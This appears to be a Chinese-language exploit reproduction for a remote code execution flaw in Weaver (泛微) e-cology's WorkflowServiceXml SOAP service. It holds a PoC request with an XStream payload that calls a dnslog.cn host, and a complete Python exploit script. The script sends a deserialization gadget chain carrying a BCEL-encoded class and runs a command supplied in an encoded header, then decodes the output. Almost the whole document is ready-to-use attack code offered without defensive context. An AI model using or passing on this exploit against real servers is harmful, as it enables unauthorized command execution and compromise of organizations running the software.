泛微 WorkflowServiceXml RCE 复现
PoC（HTTP 请求）:
POST /services%20/WorkflowServiceXml HTTP/1.1 Host: xxx.xxx Content-Type: text/xml;charset=UTF-8 Content-Length: 496 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> <web:string><map> <entry> <url>http://wtc9gq.dnslog.cn</url> <string></string> </entry> </map></web:string> <web:string>2</web:string> </web:doCreateWorkflowRequest> </soapenv:Body> </soapenv:Envelope>
执行命令（Python 脚本）:
#! /usr/bin/env python # -*- coding: utf-8 -*- import urllib import random import base64 import requests def encode(cmd): res = base64.b64encode(cmd) strs = res[::-1] return strs def decode(content): content = urllib.unquote(content) strs = content[::-1] res = base64.b64decode(strs) return res def exploit(url,cmd='ipconfig'): expurl = url + "/services%20/WorkflowServiceXml" cookies = {"JSESSIONID": "abcyPRTxFtGCX_WSXoKxx", "ecology_JSessionid": "abcyPRTxFtGCX_WSXoKxx", "testBanCookie": "test"} headers = { "WWW-Authenticate": encode(cmd), "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close" } data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> <web:string> <java.util.PriorityQueue serialization='custom'>   <unserializable-parents/>   <java.util.PriorityQueue>     <default>       <size>2</size>       <comparator class='javafx.collections.ObservableList$1'/>     </default>     <int>3</int>     <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>       <dataHandler>         <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>           <contentType>text/plain</contentType>           <is class='java.io.SequenceInputStream'>             <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>               <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>                 <names class='java.util.AbstractList$Itr'>                   <cursor>0</cursor>                   
<lastRet>-1</lastRet>                   <expectedModCount>0</expectedModCount>                   <outer-class class='java.util.Arrays$ArrayList'>                     <a class='string-array'>                       <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$adW$7bx$U$d5$V$ff$dddwg2$99$85dB$C$83$P$96$Aq$Bw$X$d0$a2N$88$92$c4$60$C$nh6$Y$D$C$$$b3$93dawf$9d$9d$rPk$d5$96$be_V$5b$w$b6$b5j$a5i$edCm$eb$s$r$82$b6$a5h$a9$7d$d1$aa$ad$c5$dab$dfO$fb$f8$a3_$bf$7e$a4$e7$cef$93$y$d9$K$7f4_rg$ee9$e7$fe$ce$fb$dc$c9$893$87$8f$CX$85$7fH$88$a0_$c4$80$88A$J$J$ec$92$mb$b7$88$q$7f$a6$E$98$o$y$Ri$R$b7$8a$b0$rd$e0$f0$r$xa$P$86$E$ec$95P$85$7d$C$de$yA$c1m$7cy$8b$80$db$r$d4$a2$9f$_o$e5$cb$j$i$e9N$Rw$f1$83o$T$f0v$J$Xc$bf$80w$88x$a7$84$Q$de$r$e1$ddx$P_$de$x$e2$7d$9c$f2$7e$R$l$Q$f0A$R$l$Sq7$b7$ef$c3$9cz$8f$88$7bE$7cD$c0G$f9$ee$80$80$8f$89$b8O$c2A$dc$_$e0$e3$S$b9$d2$_$e0$T$S$$$c7$t$f9$f2$A_$ee$e0$e4Oq$fd$P$KxH$82$c6$cd$ea$c4$c3$9c$f2i$be$7dD$c2$n$7c$86o$87E$7c$96$e3$7eN$c4$a3$o$3e$_$e2$L$o$be$c8$Z_$e2$3e$3c$s$e2q$RO$88$f8$b2$80$af0$f8$d6$q$cc$84s5Cyp$e9$8d$M$9eV$xn0$cc$eeL$98FW6$b5$d3$b0$7bb$3b$93D$a94$f6$gz$ab$95J$c5$cc8CC$b0sWlO$y$92$8c$99$D$91$a8c$t$cc$81$c6$a53I$M$fe$a8$T$d3wo$8c$a5$5d$Y$ca$81$80$af$KxR$40$8e$oN$c1$a6$Y$K$Ya$90$da$f6$eaF$daIXfF$c0$u$83$b8FO$ba$86Qp$F$7c$8d$oD$c1$Sp$98$q$a3V$d6$d6$8du$Jn$95$bf$db$c8$a4$e9$8c$R$e6$baelD$X$D$Y$E$x$T6c$vR8$s$e3$vt$cb8$82$a3$e4$e3P$c2$94$f14$9ea$a8$3a$dbX$3a$a4$a7$e2ar$93$a1$y$a2$d36$b23aF2$83$b4$N$e9$C$be$$$e3$h$f8$a6$8cc$f8$W9$m$e38$9eeP$5d$94$84$V$e90$d3Y$87$80$8cX$aa$db$88$c5$N$9b$db$f2$iC$5dA$a0$r$db$dfo$d8F$7c$8a$fbm$Z$t$b8Qs$cf$b6$a4$r$9bH$ba2$df$c1$f32$be$8b$a32$be$87$ef3$d4wY$B$db$c8d$93N$c0$b2$D$Z$xe8$83$q$k$Y2L$t0d$5b$e6$c0Bn$de$P$Yj$a6$m$t$e3$w$e3$878Y$e4w$cf$m$99K$c9$94$j$f7$a5$d3$d2c$c9$8c$8c$l$e1$c7$Uq$Z$_$e0E$Z$_$e1$t$M$8b$f9$990$3f$T$ee$99$S$5d$3c$ed$9d$S$y$e3$a7x$99$c1$eb$e4$eb$a5f$eb$b4r$d8$b4s$97$a1$3bT$O$cb$ce$Hiq$9b$e9$d8$fb$IjO$y$995d$fc$M$a7d$bc$c2CU$af$5b$a9$b0$k$cb$ea$83V8c$d8$7b$M$3b$3c$e88$e9p$3b$z$dd$c6$adY$p$e30T$M$YN$bb$he$aa$
e3$v$hZ$93$b1$My$f7s$bcZ$U$84$bciD$ea$ed$ed$N5g$9dA$KfB$8f9T$3a$87e$fc$C$bf$a4$if$b2f$q$95$c8$e8$91$96$e6h$db$ea$cb$af5t$cbE$af$9b$999$9ed$9e$dc$d32$5e$c3$afd$fc$g$bf$e1$db$df$ceDi3$5d$U$Z7$f0$f2$fc$j$7e$_$e3$P$f8$a3$80$3f$f1$tQ$fe$8c$bf0$y$d4$f3$j$X$e0$dd$97u$8cx$60g$d6$J$98$96$c3$L$c1$z$7c$Z$7f$c5$vrzG$81$40$f9$a4$At$c7$866e$j$aaI$aa$e34$99$e6$qM$86$83$ed$3d$3d$d7GV$86W$GV$adX$R$d8$b4A$8a$ba1$d4$C$d4ET$ea$97$85$89$b5J$ba$v$b4$b99D$9d$9e$8e9$JJ$a5$W$e8hk2$e2$D$c6$a5$fa$a0M5$d7$b4Rj$b5L$87$c2$Ur$5d$m$b7$b5$40$o$ce$c3$e6$ec$9bd$f5$ecK$d3I$c7$d8$ebD$G$9dT$b21$a0$P$c6$ec$8c$e14e$9d$fe$d0$95$93b$9d$869$e0$Mj$B$Z$af$e3o$bc$e0$ffN$3d$c5$b9$s$r$85$8aV$L$e8I$xcH$S$cfL$T$f9$d2$60$d8$b6e$d3$9b$d7e$d0$a0$e8$9e$f4$bb$a8$e4$s$tP$f5$U$edz$db$d2$8dL$a6$d0$l$c5m$5b$d45T$90$d6$d0D$nO$can$9a$ec$a5$a2$a6$b5$8d$fe$qY$hY$970$92$d4M$f3fr6R$a3Z$f1$e2$99$b3$_$e3$Y$a4$b3$92rEf$a5$N$db$a1$8a$aft$acNk$c8$b0$5bc$dc$9f9$c1$92$pU$d4$vx$b1$84I$7e$5c0$7d$M$b7R$84$a3$bc$JL$ddh$5c$ba$a5$c8$f3$ee$y$a5$tE$98$S$af$8d$c2$a6$b6H$c1$E$994xx$b51$E$83$r$C$3a$fd$c4D$3c$e9$c4$y$82$z$8a$e5$dc$Ctq$90It$5e$b0$q$83_$3e5S$ac$fc$98t$a9$a2$3b$h$e8$3e$a2$cb$w$96N$h$fc$fe$J$9d$d7$fd31Hy$cc$i$ab0$e5$7d$U$o$9as$dc$fb$99$T$8a$87$ed$92s$60Oy$ed$d7$b3$b6Me$5c$Y$a4$c5$J$cbSI$ac$8a$82C3$p$Z$a3$f1$3fQ$q$e7$b2$bf$a8$a6$b8$sj$9df$9d$abM$b8E$e9$Jn$e1$a1$v$t$e4$b3$$$e3$82$p$a5$a6$af$d0o$d9$5d1$9e$f9$r$e7$d0$ef$OK$k7R$e0$be$f3$e4$94$S$QH$m$PY$3d$cd$cbB$c1$af$z$a1f$eb$M$94R$8e$e7$RH$81$_a$ee$b1v$T$feU$r$bc$yq$c7$94t$bc$b6$94$bb$U$3f$c16h$fe$f1$5e$9b_$a2$d7$f2$d3$9c$8e$cbqw$e2$e7$f74$c9K$a1mm$a1$99$U$dc$da$e2V$y$85$a2e$9fcdx$a2$5c$8e$cfp$a7$3d$3fK$o$a5$ba$3a$3ffL$c3$89l$ee$ee$9c$b8$h$c8$c0D$a6$z$95$e6$a3$81$3e$cf$a86$fd$84$i$cd$d2$b4$d0$f3I$f1$r$dd$B$ea$b2$3b$Y$$$Mv$fc$ef$$$c0B$fa$5e$8c$80$ff$94$d3$t$S$7d$w$d1$ba$89v$X$d1$93$be$9a$e0$5d6$C$f6$E$f8$f7$d3$f5$b4$fa$5cb$F$q$7eC$a1$8c$8b$96$df$C$Pd$S$b8O$v$db$a8$94u$v$e5$a3$f0$e4$e0U$7c9$I$H1$cfw$Eb_$b9R$R$ed$f3$uR$b4$cf$bb$y$3a$8c$da$Jb$r$t$ca$$Q$f3$8c$c2$af$d2$c1Y$9d$cbs$98$ady$c7P$d5$
a7zGP$ad$f9$c6$a0$f4$a9$be$R$d4h$82$w$e40$a7o$e3q$a8c$a8$ed$hA$5d$u$87$b9$97$d2_$O$f3$ba$86$c7_$L$ve9$a8$f7C$O$v$f3$e9$e5$m$pk$fc$cbr$b8$m$8f$eaqQ$3d$i$d5$eb$a2z9$aaO$f5$bd1$ea0$9e$d2$3c$ca$fc$ae$b3$d1q$e8$ff$83$be$5d$Tg$40_W$E$5d$e1BWph$c9$85$968t$a5Z$f9$c6$d0$aa$f8t$e8q$ca$8f$P$fb$e9k$e9B$fed$8d$94$c1Wp$9a$3fY$pkr$f7env$ef$c1bZ$fdT$K$b3H$b2$g$d7$60$O$da$e9$df$83$$$d4$a1$Ps$R$87$K$T$f3$Jk$B$O$m$80$H$a8$7c$kA$3d$k$c3$o$i$c6$S$fa$cel$c0$cb$I$ba$9a$5e$a5$S$3aMr$ff$q$b9$ff$60$n$xC$3d$f3c$R$9b$87$r$ac$k$N$ecJ$EI$f3$C$b6$J$B$d6K$fcm$c4$l$q$7e$86$f8$b7$T$ff$5e$ye$H$b0$MQ$b2$e8$M$aa$ce$609$E$f4$d0$ef$N$C6$8f$93$o$d1$dd$de$98$t$SM$40$af$80$9b$E2$U$e3$a4$d73$9d$NT$9f$c1$a2I$89$7fa$c18$b9$ccE$s$40$c1$El$a9$h$t$3f$84b$d8I$cc$d2g$b6$8e$a3$G$V$d3h$f4CTn$c2$o$c8$c5$s$b8$9c$b3$ac$y$7d$b4X$Np3$fdy$a8$f3$b6$d1$ffk$db$L$zZ$deA$bb$b9$94$c3$97Fq$d1$G$e5beA$O$81$ce$e5$d4A$L$97S$dd$d4oT$W$8db1$95$ec$S$a2k$k$d5$c39$aa$87$8a$a3$fe$Z4$d0$af$e6U$$$n$J$5e$9fJ$90$cbPsq$Z$a5L$TU$afV$a1V$i$5d$z$95$af$ae$ac$ad$ac$95$kf$96ZQ$5b$b9J$93U$f98$db$a6$K$aaL8$9a_$f5$lg$ebU$7f$OKsX$a6$yw$3bNs$f7$ca$a5$9e$p$IQ$8f$8b$d1$i$c2$da$yu$96$ea$tJ$84$u$x$88$b2$f2$Z$88$da$ec1$9a$CcXE$85$7b$d9$Y$$$efSg$8f$e0M9$ac$ce$e1$8a$i$ae$i$c1U$5cB$pn$a3$3a$7b$Ukrh$ca$e1j$ad$ca$V$ad$9a$U$d5$aa$d4$aaQ$5c$c3$l9$ac$3d$IQi$k$86W$ad$oB$de$b0$W$a5$95$bbW$adV$bb$n$a8$e6$e4zMQ$95$J$ee$b5$e5d$v7$b2F$adQ$V$daD$c8$3em$8e$3a$87$bb$d1V$e4F$adZ$ab$ce$c9$bb1$d1p$ca$3a$ea6$ae$f9$baj$3cwK$O$edJ$c7$Ea$ae$b2$3e$df$88$dc$dd$deIm$h$K$da$ea$d4$baIm$bd$c3$98EFk$fe$fd$95l$f8$cc$dd$c3$f0lx$82$ca$c0f$c7$d8$Jj$s$b0$93$ec$Fz$e6$db$f4Qj$L$60$F$95$c4$w$g$bc$97Q$a3$ae$a6B$b8$8a$g$ae$91$9ap$Nu$ca$d5$b4k$c6Z$b4$a2$D$d7R$b1$ac$a36jG$8av66$e06$9a$f9w$d2$ac$bf$9bJ$e9$Qq$P$T$ea$v$g$e7$af$p$ca$Yz$98$88$cdLE$_$L$e2$s$WF$l$bb$C$5b$d9z$dcLm$ba$9d$r$b1$83$edG$9c$3dD$cfCH$b0Q$ecb$c7$b0$9b$3d$8b4Yj$b2$e7$d1$ceN$oK$d6f$d8$8b$d8$e3$b6$ef$83$a8$Y$c7$O$de$O$3b$E$dc$o$m$s$60$a7$fb$d2Px$a1$3ao$m$d5T$faO$a2$fa$5cb$$$87$7e$f5B$7f4$d3$3aNC$c8$7f$k$t$81$W$ea$f4$7f$83$8d$c3$cb$3b$8e
$ef$f8$e5$Ww$87$a0$f1_$h$85$f7$ae8$S$A$A </string>                     </a>                   </outer-class>                 </names>                 <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>                   <parent class='sun.misc.Launcher$ExtClassLoader'>                   </parent>                   <package2certs class='hashtable'/>                   <classes defined-in='java.lang.ClassLoader'/>                   <defaultDomain>                     <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>                     <principals/>                     <hasAllPerm>false</hasAllPerm>                     <staticPermissions>false</staticPermissions>                     <key>                     </key>                   </defaultDomain> <domains class="java.util.Collections$SynchronizedSet" serialization="custom">         <java.util.Collections_-SynchronizedCollection>           <default>             <c class="set"></c>             <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>           </default>         </java.util.Collections_-SynchronizedCollection>       </domains>                  <packages/>                   <nativeLibraries/>                   <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>                   <defaultAssertionStatus>false</defaultAssertionStatus>                   <classes/>                   <ignored__packages>                     <string>java.</string>                     <string>javax.</string>                     <string>sun.</string>                   </ignored__packages>                   <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>                     <__path>                       <paths/>                       <class__path>.</class__path>                     </__path>                     <__loadedClasses/>                   </repository>                   
<deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>                 </processorCL>               </iterator>               <type>KEYS</type>             </e>             <in class='java.io.ByteArrayInputStream'>               <buf></buf>               <pos>0</pos>               <mark>0</mark>               <count>0</count>             </in>           </is>           <consumed>false</consumed>         </dataSource>         <transferFlavors/>       </dataHandler>       <dataLen>0</dataLen>     </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>     <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>   </java.util.PriorityQueue> </java.util.PriorityQueue></web:string> <web:string>2</web:string> </web:doCreateWorkflowRequest> </soapenv:Body> </soapenv:Envelope>''' resp = requests.post(expurl, headers=headers, cookies=cookies, data=data) if '&error=' in resp.content and 'Auth=' in resp.content: result = resp.content.split('&error=')[0] result = result.replace('Auth=','') print decode(result) if __name__ == '__main__': import sys if len(sys.argv)<3: print 'python '+sys.argv[0]+' url cmd' else: url = sys.argv[1] cmd = sys.argv[2] exploit(url,cmd)